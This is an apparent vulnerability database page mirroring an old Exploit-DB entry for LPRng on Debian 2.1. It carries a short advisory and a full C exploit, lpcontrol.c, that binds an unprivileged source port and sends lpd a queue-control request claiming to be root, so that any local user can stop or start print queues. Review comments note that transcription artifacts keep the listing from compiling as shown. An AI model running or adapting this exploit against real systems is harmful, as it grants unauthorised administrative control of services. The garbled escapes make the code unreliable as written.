Debian 2.1 – Print Queue Control

Debian 2.1 – Print Queue Control

漏洞ID 1053403 漏洞类型
发布时间 1999-07-02 更新时间 1999-07-02
CVE编号 N/A
CNNVD-ID N/A
漏洞平台 Linux CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/19384
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
source: http://www.securityfocus.com/bid/508/info


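The LPRng software is an enhanced, extended, and portable version of the Berkeley LPR software (the standard UNIX printer spooler) that ships with Debian GNU/Linux. When root controls the print queue, the authentication that is used is based on whether the client source port connecting to lpd is privileged or not (on UNIX only root can bind a port below 1024, so a connection from such a port is taken to come from a client run by root). Apparently, lpd does not check the source port properly, and it is possible for any local user to control the print queue with a modified client. The consequence of this vulnerability being exploited is a compromise of print queue control. Because the faulty check is in lpd itself, the fix has to be made on the server side; a source port is at best a weak hint of privilege and is not authentication.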

---- start lpcontrol.c ----------------------------------------------
/* Exploit for lprng's source port check failure.
 * Written and tested on Debian GNU/Linux
 *
 * Chris Leishman <[email protected]>
 */


#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <stdio.h>
#include <unistd.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <errno.h>
#include <string.h>


/* Local port the client binds before connecting. 2056 is above 1023, so it is
 * not a privileged port and any user may bind it. */
#define SRC_PORT 2056
/* Destination host: the loopback address, i.e. the lpd on the same machine. */
#define HOST "127.0.0.1"
/* Destination TCP port: the printer spooler (lpd) service port. */
#define DST_PORT 515


/*
 * Builds one lpd request line and sends it over TCP from the fixed,
 * non-privileged source port SRC_PORT to HOST:DST_PORT.
 *
 * argv[1] is the printer name; the optional argv[2] is "stop" (the default)
 * or "start". Exits with EXIT_FAILURE on bad arguments or on any failed
 * socket call, and returns EXIT_SUCCESS once the line has been written.
 *
 * Defender's view: per the advisory text above, lpd decides whether a queue
 * control request made as root is allowed by looking at the client's source
 * port, and does not apply that check properly. The weakness is therefore in
 * the server. A control request naming root that arrives on port 515 from a
 * source port of 1024 or above is what a corrected lpd must refuse, and is
 * worth logging.
 */
int main(int argc, char **argv)
{
    int sock;
    struct sockaddr_in dest_sin;
    struct sockaddr_in src_sin;
    struct hostent *hp;
    unsigned long ipnum;
    char line[256];
    int mode = 0;   /* 0 = "stop" (default), 1 = "start" */

    /* A printer name is mandatory. */
    if (argc < 2)
    {
        fprintf(stderr, "Usage: %s printer [stop|start]n", argv[0]);
        exit(EXIT_FAILURE);
    }

    /* Optional second argument selects the action; anything other than
     * "start" or "stop" is rejected. */
    if (argc >= 3)
    {
        if (!strcmp(argv[2], "start"))
            mode = 1;
        else if (strcmp(argv[2], "stop"))
        {
            fprintf(stderr, "Invalid mode.  Use stop or start.n");
            fprintf(stderr, "Usage: %s printer [stop|start]n", argv[0]);
            exit(EXIT_FAILURE);
        }
    }
    
    /* Request line: one byte with value 6, the printer name, the literal user
     * name "root", the action, and the printer name again. The user name is
     * plain text supplied by the client, so nothing in the message itself
     * proves who sent it.
     * NOTE(review): byte 6 is presumably LPRng's control-request opcode;
     * confirm against the LPRng protocol documentation.
     * NOTE(review): the trailing "=20" here and the bare "n" ending the format
     * strings look like transcription artifacts of this page; as shown, the
     * listing does not compile. */
    snprintf(line, sizeof(line), "%c%s root %s %sn",=20
             6, argv[1], (mode)? "start":"stop", argv[1]);

    /* Destination address: zeroed first, then the port in network byte order. */
    memset(&dest_sin, 0, sizeof(struct sockaddr_in));
    dest_sin.sin_port = htons((short) DST_PORT);

    /* HOST is tried as a dotted-quad address first; only if that fails is it
     * looked up as a host name. */
    ipnum = (unsigned long) inet_addr(HOST);
    if (ipnum != ((unsigned long) INADDR_NONE))
    {
        dest_sin.sin_family = AF_INET;
        dest_sin.sin_addr.s_addr = ipnum;
    }
    else
    {
        if ((hp = gethostbyname(HOST)) == NULL)
        {
            fprintf(stderr, "Host lookup failed.n");
            exit(EXIT_FAILURE);
        }

        /* Use the first address returned by the lookup. */
        dest_sin.sin_family = hp->h_addrtype;
        memcpy(&dest_sin.sin_addr.s_addr,hp->h_addr_list[0],
           (size_t)hp->h_length);
    }

    if ((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
    {
        perror("Socket call failed");
        exit(EXIT_FAILURE);
    }

    /* Local address: any interface, fixed source port SRC_PORT. This is the
     * port number the server-side check is meant to inspect. */
    src_sin.sin_family = AF_INET;
    src_sin.sin_addr.s_addr = INADDR_ANY;
    src_sin.sin_port = htons((u_short) SRC_PORT);

    if ((bind(sock, (struct sockaddr *)&src_sin, sizeof(src_sin))) < 0)
    {
        perror("Bind failed");
        exit(EXIT_FAILURE);
    }

    if (connect(sock, (struct sockaddr *)&dest_sin, sizeof(dest_sin)) < 0)
    {
        close(sock);
        perror("Connect failed");
        exit(EXIT_FAILURE);
    }

    /* The request is sent in a single write; no reply from lpd is read. */
    if (write(sock, line, strlen(line)) <= 0)
    {
        perror("Write failed");
        exit(EXIT_FAILURE);
    }

    close(sock);

    return EXIT_SUCCESS;
}

---- stop lpcontrol.c -----------------------------------------------
